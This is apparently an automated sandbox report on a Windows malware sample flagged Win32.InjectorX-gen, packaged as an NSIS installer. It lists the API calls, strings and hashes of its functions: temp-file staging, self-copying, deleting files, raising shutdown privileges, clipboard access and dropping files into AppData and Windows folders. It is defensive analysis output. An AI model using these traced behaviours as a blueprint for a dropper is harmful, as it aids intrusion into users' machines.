                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448
                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                            • ExitProcess.KERNEL32 ref: 004036D4
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                            • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                            • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                            • ExitProcess.KERNEL32 ref: 0040387A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 2488574733-2244295707
                                            • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                            • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                            • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                            • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

                                            Control-flow Graph

                                            [Figure: control-flow graph of the function starting at 004053EF; legend: Executed / Not Executed]
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                            • GetClientRect.USER32(?,?), ref: 00405499
                                            • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                            • ShowWindow.USER32(?,00000008), ref: 0040553C
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                              • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                            • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                            • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                            • ShowWindow.USER32(00000000), ref: 004055E8
                                            • ShowWindow.USER32(?,00000008), ref: 004055ED
                                            • ShowWindow.USER32(00000008), ref: 00405637
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                            • CreatePopupMenu.USER32 ref: 0040567C
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                            • GetWindowRect.USER32(?,?), ref: 004056B0
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                            • OpenClipboard.USER32(00000000), ref: 00405711
                                            • EmptyClipboard.USER32 ref: 00405717
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                            • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                            • CloseClipboard.USER32 ref: 00405772
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {$6B
                                            • API String ID: 590372296-3705917127
                                            • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                            • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                            • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                            • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68

                                            Control-flow Graph

                                            [Figure: control-flow graph of the function starting at 0040595A; legend: Executed / Not Executed]
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405983
                                            • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059CB
                                            • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059EE
                                            • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059F4
                                            • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A04
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                            • FindClose.KERNEL32(00000000), ref: 00405AB3
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                            • \*.*, xrefs: 004059C5
                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 0040595A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-355736728
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 0040659A
                                            • FindClose.KERNEL32(00000000), ref: 004065A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: 8gB
                                            • API String ID: 2295610775-1733800166
                                            APIs
                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 004021BD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                            • API String ID: 542301482-192101639
                                            APIs
                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0

                                            Control-flow Graph

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                            • ShowWindow.USER32(?), ref: 00403D61
                                            • DestroyWindow.USER32 ref: 00403D75
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                            • GetDlgItem.USER32(?,?), ref: 00403DB2
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                            • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                            • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                            • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                            • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                            • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                            • EnableWindow.USER32(?,?), ref: 00403FE4
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                            • EnableMenuItem.USER32(00000000), ref: 00404001
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                            • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                            • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                            • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID: 6B
                                            • API String ID: 3282139019-4127139157

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                            • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000), ref: 004039DB
                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea), ref: 00403AC2
                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                            • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                            • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                            • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                            • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                            • API String ID: 1975747703-327696986

                                            Control-flow Graph

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
                                            • soft, xrefs: 00402FAF
                                            • C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
                                            • Error launching installer, xrefs: 00402F11
                                            • Null, xrefs: 00402FB8
                                            • Inst, xrefs: 00402FA6
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                            • C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 00402EC1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                            Control-flow Graph (graph not reproduced; first node 40626e-406279)
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063AF
                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                            • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063FE
                                            • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                            • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                            Control-flow Graph (graph not reproduced; first node 40176f-401794)
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017B0
                                            • CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017D5
                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma

                                            Control-flow Graph (graph not reproduced; first node 4052b0-4052c5)
                                            APIs
                                            • lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                            • lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                            • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                            • SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Completed

                                            Control-flow Graph (graph not reproduced; first node 4065b6-4065d6)
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                            • wsprintfW.USER32 ref: 00406608
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\

                                            Control-flow Graph (graph not reproduced; first node 4030fa-403111)
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%

                                            Control-flow Graph

                                            control_flow_graph 714 40577f-4057ca CreateDirectoryW 715 4057d0-4057dd GetLastError 714->715 716 4057cc-4057ce 714->716 717 4057f7-4057f9 715->717 718 4057df-4057f3 SetFileSecurityW 715->718 716->717 718->716 719 4057f5 GetLastError 718->719 719->717
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                            • GetLastError.KERNEL32 ref: 004057D6
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                            • GetLastError.KERNEL32 ref: 004057F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 3449924974-224404859

                                            Control-flow Graph

                                            control_flow_graph 720 405d6d-405d79 721 405d7a-405dae GetTickCount GetTempFileNameW 720->721 722 405db0-405db2 721->722 723 405dbd-405dbf 721->723 722->721 724 405db4 722->724 725 405db7-405dba 723->725 724->725
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405D8B
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589), ref: 00405DA6
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D72, 00405D76
                                            • nsa, xrefs: 00405D7A
